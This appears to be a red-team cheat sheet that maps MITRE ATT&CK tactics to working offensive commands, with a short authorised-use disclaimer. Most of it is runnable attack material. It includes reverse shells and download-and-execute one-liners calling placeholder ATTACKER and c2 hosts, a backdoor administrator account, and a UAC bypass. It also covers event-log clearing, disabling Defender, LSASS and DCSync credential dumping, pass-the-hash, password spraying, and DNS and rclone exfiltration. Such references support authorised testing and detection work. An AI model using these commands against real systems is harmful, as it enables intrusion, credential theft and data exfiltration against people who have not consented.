โ† All cheat sheets

MITRE-REDTEAM

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Interactive tool: Red-Team Comms Builder

OVERVIEW#

MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge)
is a knowledge base of adversary behavior based on real-world observations.
This cheatsheet maps key techniques to practical tools and commands for
red team operations.

ATT&CK Matrix: Enterprise covers Windows, Linux, macOS, Cloud, Network,
Containers. Current version: v16 (2024).

INITIAL ACCESS (TA0001)#

T1566 - Phishing
  T1566.001 - Spearphishing Attachment
    # Macro-enabled document delivery
    # msfvenom -p windows/meterpreter/reverse_https LHOST=x LPORT=443 -f vba
    # Use tools: GoPhish, Evilginx2 (for token phishing)

  T1566.002 - Spearphishing Link
    # Evilginx2 phishlet for credential/token harvesting
    evilginx2> phishlets hostname o365 login.target.com
    evilginx2> lures create o365

  T1566.003 - Spearphishing via Service
    # Target via LinkedIn, Teams, Slack messages

T1190 - Exploit Public-Facing Application
    # Scan for known vulnerabilities
    nuclei -u https://target.com -t cves/
    # Web application exploitation
    sqlmap -u "https://target.com/page?id=1" --batch
    # Check for Log4Shell, Spring4Shell, etc.

T1133 - External Remote Services
    # Brute force VPN, RDP, SSH
    hydra -L users.txt -P pass.txt rdp://target
    # Exploit exposed services (Citrix, Pulse Secure, FortiGate)

T1078 - Valid Accounts
    # Credential stuffing with leaked databases
    # Password spraying
    spray.sh -smb target 'Spring2024!' users.txt

EXECUTION (TA0002)#

T1059 - Command and Scripting Interpreter
  T1059.001 - PowerShell
    powershell -ep bypass -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://c2/payload.ps1')"
    # AMSI bypass first (see EVASION-TECHNIQUES.txt)

  T1059.003 - Windows Command Shell
    cmd.exe /c "certutil -urlcache -split -f http://c2/payload.exe %TEMP%\payload.exe"

  T1059.004 - Unix Shell
    bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'
    curl http://c2/payload.sh | bash

  T1059.005 - Visual Basic
    # Office macro execution, WScript/CScript

  T1059.006 - Python
    python3 -c 'import socket,subprocess;s=socket.socket();s.connect(("ATTACKER",PORT));subprocess.call(["/bin/bash","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'

T1047 - Windows Management Instrumentation
    wmic /node:TARGET process call create "cmd.exe /c payload.exe"
    # Impacket: wmiexec.py DOMAIN/user:pass@TARGET

T1053 - Scheduled Task/Job
  T1053.005 - Scheduled Task (Windows)
    schtasks /create /tn "Update" /tr "C:\payload.exe" /sc daily /ru SYSTEM
  T1053.003 - Cron (Linux)
    echo "* * * * * /tmp/shell.sh" | crontab -

PERSISTENCE (TA0003)#

T1547 - Boot or Logon Autostart Execution
  T1547.001 - Registry Run Keys
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Update /d "C:\payload.exe"
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Svc /d "C:\payload.exe"

  T1547.004 - Winlogon Helper DLL
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe,payload.exe"

  T1547.009 - Shortcut Modification
    # Replace .lnk target with payload path

T1053 - Scheduled Task/Job (also Persistence)
    schtasks /create /tn "ChromeUpdate" /tr "powershell -ep bypass -f C:\update.ps1" /sc onlogon /ru SYSTEM

T1543 - Create or Modify System Process
  T1543.003 - Windows Service
    sc create SvcUpdate binPath= "C:\payload.exe" start= auto
    # Or use PowerShell: New-Service -Name "SvcUpdate" -BinaryPathName "C:\payload.exe"

T1136 - Create Account
    net user backdoor P@ssw0rd123 /add
    net localgroup administrators backdoor /add

PRIVILEGE ESCALATION (TA0004)#

T1068 - Exploitation for Privilege Escalation
    # Windows kernel exploits: PrintNightmare, EfsPotato, GodPotato
    # Linux: DirtyPipe (CVE-2022-0847), PwnKit (CVE-2021-4034)

T1055 - Process Injection
    # Inject into elevated process
    # Tools: Process Hacker, Cobalt Strike inject command

T1548 - Abuse Elevation Control Mechanism
  T1548.002 - UAC Bypass
    # UACME project - multiple bypass methods
    # fodhelper.exe bypass
    reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
    reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /f
    fodhelper.exe

T1078 - Valid Accounts (also PrivEsc)
    # Use credentials found during enumeration
    # Kerberoasting, AS-REP roasting (see AD-EXPLOITATION.txt)

DEFENSE EVASION (TA0005)#

T1070 - Indicator Removal
  T1070.001 - Clear Windows Event Logs
    wevtutil cl Security
    wevtutil cl System
    wevtutil cl Application

  T1070.004 - File Deletion
    # Remove tools after use
    del /f /q C:\payload.exe
    # Timestomping
    timestomp.exe payload.exe -m "01/01/2023 12:00:00"

T1036 - Masquerading
  T1036.005 - Match Legitimate Name
    # Rename payload to svchost.exe, chrome.exe, etc.
    rename payload.exe svchost.exe

T1027 - Obfuscated Files or Information
    # Base64 encode payloads
    certutil -encode payload.exe payload.b64
    # PowerShell encoding
    powershell -EncodedCommand <base64string>

T1562 - Impair Defenses
  T1562.001 - Disable or Modify Tools
    Set-MpPreference -DisableRealtimeMonitoring $true
    # ETW patching, AMSI bypass (see EVASION-TECHNIQUES.txt)

CREDENTIAL ACCESS (TA0006)#

T1003 - OS Credential Dumping
  T1003.001 - LSASS Memory
    # Mimikatz
    mimikatz# sekurlsa::logonpasswords
    # ProcDump (LOLBin approach)
    procdump.exe -ma lsass.exe lsass.dmp
    # Comsvcs.dll MiniDump
    rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> dump.bin full

  T1003.003 - NTDS.dit
    # DCSync (see AD-EXPLOITATION.txt)
    mimikatz# lsadump::dcsync /domain:target.local /user:krbtgt
    # ntdsutil snapshot
    ntdsutil "ac i ntds" "ifm" "create full C:\temp" q q

  T1003.006 - DCSync
    secretsdump.py DOMAIN/user:pass@DC_IP

T1110 - Brute Force
    # Password spraying
    crackmapexec smb target -u users.txt -p 'Spring2024!' --continue-on-success
    kerbrute passwordspray --dc DC_IP -d target.local users.txt 'Spring2024!'

T1558 - Steal or Forge Kerberos Tickets
    # Kerberoasting
    GetUserSPNs.py target.local/user:pass -dc-ip DC_IP -request
    # AS-REP Roasting
    GetNPUsers.py target.local/ -dc-ip DC_IP -usersfile users.txt -no-pass

LATERAL MOVEMENT (TA0008)#

T1021 - Remote Services
  T1021.001 - RDP
    xfreerdp /u:user /p:pass /v:TARGET /dynamic-resolution

  T1021.002 - SMB/Admin Shares
    # PsExec
    psexec.py DOMAIN/user:pass@TARGET
    # smbexec
    smbexec.py DOMAIN/user:pass@TARGET

  T1021.003 - DCOM
    dcomexec.py DOMAIN/user:pass@TARGET

  T1021.006 - WinRM
    evil-winrm -i TARGET -u user -p pass
    # PowerShell remoting
    Enter-PSSession -ComputerName TARGET -Credential DOMAIN\user

T1550 - Use Alternate Authentication Material
  T1550.002 - Pass the Hash
    crackmapexec smb TARGET -u user -H NTLM_HASH
    psexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET

  T1550.003 - Pass the Ticket
    export KRB5CCNAME=ticket.ccache
    psexec.py -k -no-pass DOMAIN/user@TARGET

COLLECTION (TA0009)#

T1005 - Data from Local System
    # Search for sensitive files
    dir /s /b C:\Users\*.kdbx C:\Users\*.key C:\Users\*.pfx
    findstr /si "password" *.txt *.xml *.config *.ini

T1039 - Data from Network Shared Drive
    # Enumerate shares
    crackmapexec smb TARGET -u user -p pass --shares
    smbclient //TARGET/share -U user%pass

T1113 - Screen Capture
    # Cobalt Strike: screenshot, screenwatch
    # Metasploit: use post/multi/gather/screen_spy

EXFILTRATION (TA0010)#

T1041 - Exfiltration Over C2 Channel
    # Use existing C2 channel (Cobalt Strike download)

T1048 - Exfiltration Over Alternative Protocol
  T1048.003 - Over Unencrypted Protocol
    # DNS exfiltration
    dnscat2 --dns server=ATTACKER,domain=exfil.attacker.com
    # ICMP exfiltration
    # HTTP(S) exfiltration to cloud storage

T1567 - Exfiltration Over Web Service
    # Exfil to cloud storage (OneDrive, Google Drive, S3)
    # rclone copy C:\sensitive\ remote:exfil-bucket/
    rclone copy /data remote:bucket --transfers=1 --bwlimit 100K

T1029 - Scheduled Transfer
    # Stage data and exfil during off-hours to blend with traffic

RED TEAM OPSEC TIPS#

- Map your operations to ATT&CK techniques for reporting
- Log all commands and actions with timestamps
- Validate detection coverage against techniques used
- Use technique IDs in debrief reports for blue team mapping
- Test one technique at a time to identify detection gaps
- Reference ATT&CK Navigator for coverage visualization
- Check attack.mitre.org for technique detection guidance